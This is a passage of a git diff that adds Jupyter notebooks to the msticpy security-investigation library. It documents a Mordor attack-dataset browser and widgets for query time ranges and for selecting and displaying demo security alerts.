+    "mdr_browser = MordorBrowser()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Mordor Browser Details\n",
+    "The top scrollable list is a list of the Mordor datasets. Selecting one of these updates the data in the lower half of the browser.\n",
+    "\n",
+    "#### Filter Drop-down\n",
+    "To narrow your search you can filter using a text search or filter by Mitre Attack Techniques or Tactics.\n",
+    "- The Filter text box uses the same syntax as the provider `search_queries()` function.\n",
+    "  - Simple text string will find matches for datasets that contain this string\n",
+    "  - Strings separated by \",\" are treated as OR terms - i.e. it will match items that contain ANY of the substrings\n",
+    "  - Strings separated by \"+\" are treated as AND terms - i.e. it will match items that contain ALL of the substrings\n",
+    "- The Mitre Techniques and Tactics lists are multi-select lists. Only items that have techniques and tactics matching\n",
+    "  the selected items will be show.\n",
+    "- Reset Filter button will clear any filtering.\n",
+    "\n",
+    "#### Main Details Window\n",
+    "- title, ID, author, creation date, modification date and description are self-explanatory.\n",
+    "- tags can be used for searching\n",
+    "- file_paths (see below)\n",
+    "- attacks - lists related Mitre Technique and Tactics. The item title is a link to the Mitre page describing the technique or tactic.\n",
+    "- notebooks - if there is a notebook in the Threat Hunter Playbook site, a link to it is shown here. (multiple notebooks might be shown)\n",
+    "- simulation - raw data listing the steps in the attack (and useful for replaying the attack in a demo environment).\n",
+    "- references - links to any external data about the attack.\n",
+    "\n",
+    "#### File_paths\n",
+    "This section allows you to select, download and (in most cases) display the event data relating to the attack.\n",
+    "\n",
+    "Select a file and click on the Download button.\n",
+    "\n",
+    "The zipped file is downloaded and extracted. If it is event data, this is converted to a\n",
+    "pandas DataFrame and displayed below the rest of the data.\n",
+    "\n",
+    "The current dataset is available as an attribute of the browser:\n",
+    "```\n",
+    "    mdr_browser.current_dataset\n",
+    "```\n",
+    "\n",
+    "Datasets that you've downloaded and displayed in this session are also cached in the browser and available in the \n",
+    "`mdr_browser.datasets` attribute.\n",
+    "\n",
+    "#### Downloaded files\n",
+    "By default files are downloaded and extracted to the current folder. You can change this with the\n",
+    "`save_folder` parameter when creating the `MordorBrowser` object.\n",
+    "\n",
+    "You can also specify the `use_cached` parameter. By default, this is `True`, which causes downloaded files not\n",
+    "to be deleted after extraction. These local copies are used if you try to view the same data set again.\n",
+    "This also works across sessions.\n",
+    "\n",
+    "If `use_cache` is set to False, files are deleted immediately after downloading, extracting and populating the\n",
+    "DataFrame."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Using the standard query browser\n",
+    "\n",
+    "> **Note** - In the `Example` section, ignore the examples of parameters<br>\n",
+    "> passed to the query - these are not needed and ignored."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 22,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "cb323a2e318048f398fdad41a831eeb2",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>AWS Cloud Bank Breach S3</h3><div></div><div>Notes</div><div>Mordor ID: SDAWS-200914011940</div><div>This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.</div><div></div><div>Mitre Techniques: T1078: Valid Accounts, T1530: Data from Cloud Storage Object</div><div>Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion, TA0009: Collection</div><div></div><p><b>Parameters</b></p><br><p><b>Query</b></p><pre>https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datase\n",
+       "  ts/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip</pre><br>\n",
+       "        <p><b>Example</b></p>\n",
+       "        <p>{QueryProvider}[.QueryPath].QueryName(params...)</p>\n",
+       "        <pre>qry_prov.atomic.aws.collection.ec2_proxy_s3_exfiltration(start=start, end=end, hostname=host)</pre>\n",
+       "    "
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "mdr_data.browse_queries()"
+   ]
+  }
+ ],
+ "metadata": {
+  "interpreter": {
+   "hash": "b736adfe05d9ae282eea4c01a733d58a0215ef3399d39339e6557e4c515b0f48"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.7.10 64-bit (conda)",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.7"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/NotebookWidgets.ipynb b/docs/notebooks/NotebookWidgets.ipynb
new file mode 100644
index 000000000..d68ab6488
--- /dev/null
+++ b/docs/notebooks/NotebookWidgets.ipynb
@@ -0,0 +1,1889 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - nbwidgets\n",
+    "## Description:\n",
+    "This contains a few aggregated widgets using IPyWidgets that help speed things up during an investigation.\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "MSTICpy versions >= 0.8.5"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='contents'></a>\n",
+    "## Table of Contents\n",
+    "- [Setting query start/end times](#QueryTime)\n",
+    "- [Simple time range](#Lookback)\n",
+    "- [Selecting and Displaying Alerts](#AlertSelector)\n",
+    "- [Selecting from list or dict](#SelectString)\n",
+    "- [Getting a value from environment](#GetEnvironmentKey)\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:12:36.439490Z",
+     "start_time": "2019-12-19T22:12:34.694845Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "from IPython.display import display, Markdown\n",
+    "import pandas as pd\n",
+    "# Import nbtools package\n",
+    "from msticpy.nbtools import *\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='QueryTime'></a>[Contents](#contents)\n",
+    "## QueryTime\n",
+    "\n",
+    "This widget is used to specify time boundaries - designed to be used with the built-in msticpy queries and custom queries.\n",
+    "The `start` and `end` times are exposed as datetime properties.\n",
+    "\n",
+    "```\n",
+    "QueryTime.\n",
+    "\n",
+    "Composite widget to capture date and time origin\n",
+    "and set start and end times for queries.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "QueryParamProvider : QueryParamProvider\n",
+    "    Abstract base class\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "origin_time : datetime, optional\n",
+    "    The origin time (the default is `datetime.utcnow()`)\n",
+    "label : str, optional\n",
+    "    The description to display\n",
+    "    (the default is 'Select time ({units}) to look back')\n",
+    "before : int, optional\n",
+    "    The default number of `units` before the `origin_time`\n",
+    "    (the default is 60)\n",
+    "after : int, optional\n",
+    "    The default number of `units` after the `origin_time`\n",
+    "    (the default is 10)\n",
+    "max_before : int, optional\n",
+    "    The largest value for `before` (the default is 600)\n",
+    "max_after : int, optional\n",
+    "    The largest value for `after` (the default is 100)\n",
+    "units : str, optional\n",
+    "    Time unit (the default is 'min')\n",
+    "    Permissable values are 'day', 'hour', 'minute', 'second'\n",
+    "    These can all be abbreviated down to initial characters\n",
+    "    ('d', 'm', etc.)\n",
+    "auto_display : bool, optional\n",
+    "    Whether to display on instantiation (the default is False)\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:12:42.494790Z",
+     "start_time": "2019-12-19T22:12:42.453819Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "cd7d9096866d4bbd98dc4c9634ee1409",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "q_times = nbwidgets.QueryTime(units='day', max_before=20, before=5, max_after=1)\n",
+    "q_times.display()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-02T23:37:00.573557Z",
+     "start_time": "2019-09-02T23:37:00.569561Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "2022-01-21 00:35:34.278282 .... 2022-01-27 00:35:34.278282\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(q_times.start, '....', q_times.end)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Keep multiple query boundaries aligged by having QueryTime instances reference the time of the same alert or event, or have them chained from one another by referencing the origin_time of an earlier QueryTimes object"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:29:50.924729Z",
+     "start_time": "2019-12-19T22:29:50.845790Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "fedb9eb46b384384ae5c0198bb5dfe34",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d0bbcf63d76f4fdb87e09c1ebde26eaf",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from datetime import datetime, timedelta\n",
+    "class MyAlert:\n",
+    "    pass\n",
+    "alert = MyAlert()\n",
+    "alert.TimeGenerated = datetime.utcnow() - timedelta(15)\n",
+    "alert.TimeGenerated\n",
+    "\n",
+    "q_times1 = nbwidgets.QueryTime(units='hour', max_before=20, before=1, max_after=1, \n",
+    "                             origin_time=alert.TimeGenerated, auto_display=True)\n",
+    "\n",
+    "q_times2 = nbwidgets.QueryTime(units='hour', max_before=20, before=4, max_after=2, \n",
+    "                             origin_time=alert.TimeGenerated, auto_display=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:29:53.682587Z",
+     "start_time": "2019-12-19T22:29:53.608644Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "8f84a90208c84d21882e95a8a43865c8",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "53ad7a903b4c4765b7c66a6cc7b27b86",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(HTML(value='<h4>Set query time boundaries</h4>'), HBox(children=(DatePicker(value=datetime.date…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "alert.TimeGenerated = datetime.utcnow()\n",
+    "q_times1 = nbwidgets.QueryTime(units='hour', max_before=20, before=1, max_after=1, \n",
+    "                             origin_time=alert.TimeGenerated, auto_display=True)\n",
+    "\n",
+    "q_times2 = nbwidgets.QueryTime(units='hour', max_before=20, before=4, max_after=2, \n",
+    "                             origin_time=q_times2.origin_time, auto_display=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-02T23:37:04.725203Z",
+     "start_time": "2019-09-02T23:37:04.721208Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "SecurityAlert \n",
+      "| where TimeGenerated >= datetime(2022-01-25 23:35:34.609278)\n",
+      "| where TimeGenerated <= datetime(2022-01-26 06:35:34.609278)\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Use the values in a query\n",
+    "my_kql = f'''\n",
+    "SecurityAlert \n",
+    "| where TimeGenerated >= datetime({q_times1.start})\n",
+    "| where TimeGenerated <= datetime({q_times1.end})'''\n",
+    "print(my_kql)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='Lookback'></a>[Contents](#contents)\n",
+    "## Lookback\n",
+    "Simpler version with single slider value\n",
+    "\n",
+    "Docstring:\n",
+    "`nbtools.Lookback?`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:29:59.905261Z",
+     "start_time": "2019-12-19T22:29:59.893270Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "2f5abb5c524749bfab1b82231b266038",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "IntSlider(value=6, description='Select time (HOUR) to look back', layout=Layout(height='50px', width='60%'), m…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "alert.TimeGenerated = datetime.utcnow() - timedelta(5)\n",
+    "lb = nbwidgets.Lookback(origin_time=alert.TimeGenerated, auto_display=True, max_value=48)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-02T23:37:09.268885Z",
+     "start_time": "2019-09-02T23:37:09.265888Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "2022-01-20 18:35:34.781798 .... 2022-01-21 00:35:34.781798\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(lb.start, '....', lb.end)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='AlertSelector'></a>[Contents](#contents)\n",
+    "## Alert Browser\n",
+    "\n",
+    "```\n",
+    "SelectAlert.\n",
+    "\n",
+    "View list of alerts and select one for investigation.\n",
+    "Optionally provide and action to call with the selected alert as a parameter\n",
+    "(typically used to display the alert.)\n",
+    "\n",
+    "Attributes:\n",
+    "    selected_alert: the selected alert\n",
+    "    alert_id: the ID of the selected alert\n",
+    "    alerts: the current alert list (DataFrame)\n",
+    "Init docstring:\n",
+    "Create a new instance of AlertSelector.\n",
+    "\n",
+    "Parameters\n",
+    "----------\n",
+    "alerts : pd.DataFrame\n",
+    "    DataFrame of alerts.\n",
+    "action : Callable[..., None], optional\n",
+    "    Optional function to execute for each selected alert.\n",
+    "    (the default is None)\n",
+    "columns : list, optional\n",
+    "    Override the default column names to use from `alerts`\n",
+    "    (the default is ['StartTimeUtc', 'AlertName',\n",
+    "    'CompromisedEntity', 'SystemAlertId'])\n",
+    "auto_display : bool, optional\n",
+    "    Whether to display on instantiation (the default is False)\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Simple alert selector\n",
+    "Selected alert is available as `select_alert_widget.selected_alert` property"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:33:01.169572Z",
+     "start_time": "2019-12-19T22:33:01.108619Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/markdown": [
+       "### Simple alert selector"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Markdown object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/markdown": [
+       "Selected alert is available as `select_alert_widget.selected_alert`"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Markdown object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "43039f9d370344518ed60d9d097a0fec",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Load test data\n",
+    "alerts = pd.read_csv('data/alertlist.csv')\n",
+    "\n",
+    "display(Markdown('### Simple alert selector'))\n",
+    "display(Markdown('Selected alert is available as `select_alert_widget.selected_alert`'))\n",
+    "alert_select = nbwidgets.SelectAlert(alerts=alerts)\n",
+    "alert_select.display()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Alert selector with action=SecurityAlert'\n",
+    "You can pass a function that returns one or more displayable objects.\n",
+    "You can also pass a class (in this case we're passing `SecurityAlert`) that produces an IPython displayable object.\n",
+    "\n",
+    "The `action` class/function is passed the raw alert row as a parameter, as it is selected from the list"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:33:22.044868Z",
+     "start_time": "2019-12-19T22:33:21.987913Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ea88e7c33d9b4bd594a0656006ace9f7",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "            <h3>Alert: 'DC local group addition - Demo'</h3>\n",
+       "            <b>Alert_time:</b> 2019-01-11 06:31:40,\n",
+       "            <b>Compr_entity:</b> nan,\n",
+       "            <b>Alert_id:</b> self.properties['SystemAlertId']\n",
+       "            <table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Unnamed: 0</th>\n",
+       "      <td>0</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TenantId</th>\n",
+       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>StartTimeUtc</th>\n",
+       "      <td>2019-01-11 06:31:40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>EndTimeUtc</th>\n",
+       "      <td>2019-01-12 06:31:40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProviderAlertId</th>\n",
+       "      <td>e0c9484b-ad5f-4161-b73b-388676c05818</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <td>047f47d6-79b7-4502-824b-97abc4905a73</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ProviderName</th>\n",
+       "      <td>CustomAlertRule</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>VendorName</th>\n",
+       "      <td>Alert Rule</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertType</th>\n",
+       "      <td>DC local group addition - Demo</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertName</th>\n",
+       "      <td>DC local group addition - Demo</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <td>DC local group addition - Demo</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Description</th>\n",
+       "      <td>Domain controllers local group addition</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Severity</th>\n",
+       "      <td>Low</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>IsIncident</th>\n",
+       "      <td>False</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <td>{'Alert Mode': 'Aggregated', 'Search Query': '{\"detailBladeInputs\":{\"id\":\"/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\",\"parameters\":{\"q\":\"SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\"75.10.91.22\\\"\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\",\"timeInterval\":{\"intervalDuration\":86400,\"intervalEnd\":\"2019-01-12T06%3A31%3A40.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\"75.10.91.22\\\"\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}', 'Search Query Results Overall Count': '23034', 'Threshold Operator': 'Greater Than', 'Threshold Value': '10000', 'Query Interval in Minutes': '1440', 'Suppression in Minutes': '800', 'Total Account Entities': '1563', 'Total IP Entities': '1', 'Total Host Entities': '1'}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Entities</th>\n",
+       "      <td>[{'$id': '3', 'Address': '75.10.91.22', 'Type': 'ip', 'Count': 23034}, {'$id': '4', 'HostName': 'DHCPContoso77', 'Type': 'host', 'Count': 23034}, {'$id': '5', 'Name': 'ADMINISTRATOR', 'NTDomain': '', 'Host': {'$ref': '4'}, 'IsDomainJoined': False, 'Type': 'account', 'Count': 5909}, {'$id': '6', 'Name': 'ADMIN', 'NTDomain': '', 'Host': {'$ref': '4'}, 'IsDomainJoined': False, 'Type': 'account', 'Count': 878}, {'$id': '7', 'Name': 'USER', 'NTDomain': '', 'Host': {'$ref': '4'}, 'IsDomainJoined': False, 'Type': 'account', 'Count': 486}]</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceLevel</th>\n",
+       "      <td>Unknown</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ConfidenceScore</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <td>3c1bb38c-82e3-4f8d-a115-a7110ba70d05</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <td>contoso77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <td>2019-01-12 06:41:44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>ResourceId</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>SourceComputerId</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><br/><h3>ExtendedProperties:</h3><table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>0</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>Alert Mode</th>\n",
+       "      <td>Aggregated</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Search Query</th>\n",
+       "      <td>{\"detailBladeInputs\":{\"id\":\"/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\",\"parameters\":{\"q\":\"SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\"75.10.91.22\\\"\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\",\"timeInterval\":{\"intervalDuration\":86400,\"intervalEnd\":\"2019-01-12T06%3A31%3A40.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\"75.10.91.22\\\"\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Search Query Results Overall Count</th>\n",
+       "      <td>23034</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Threshold Operator</th>\n",
+       "      <td>Greater Than</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Threshold Value</th>\n",
+       "      <td>10000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Query Interval in Minutes</th>\n",
+       "      <td>1440</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Suppression in Minutes</th>\n",
+       "      <td>800</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Total Account Entities</th>\n",
+       "      <td>1563</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Total IP Entities</th>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Total Host Entities</th>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table><h3>Entity counts: </h3>ip: 1, host: 1, account: 3"
+      ],
+      "text/plain": [
+       "SecurityAlert(Unnamed: 0=0, TenantId=802d39e1-9d70-404d-832c-2de5e2478eda, StartTimeUtc=2019-0...)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "alert_select = nbwidgets.SelectAlert(alerts=alerts, action=SecurityAlert)\n",
+    "alert_select.display()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-12-19T22:39:52.652753Z",
+     "start_time": "2019-12-19T22:39:52.584806Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/markdown": [
+       "### Or a more detailed display with extracted entities"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Markdown object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ad23caa985374aa3a085b93c3b4ab484",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter alerts by title:', style=DescriptionStyle(description_width=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "            <h3>Alert: 'Suspicious Account Creation Detected'</h3>\n",
+       "            <b>Alert_time:</b> 2019-01-15 09:15:03,\n",
+       "            <b>Compr_entity:</b> MSTICALERTSWIN1,\n",
+       "            <b>Alert_id:</b> self.properties['SystemAlertId']\n",
+       "            <table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
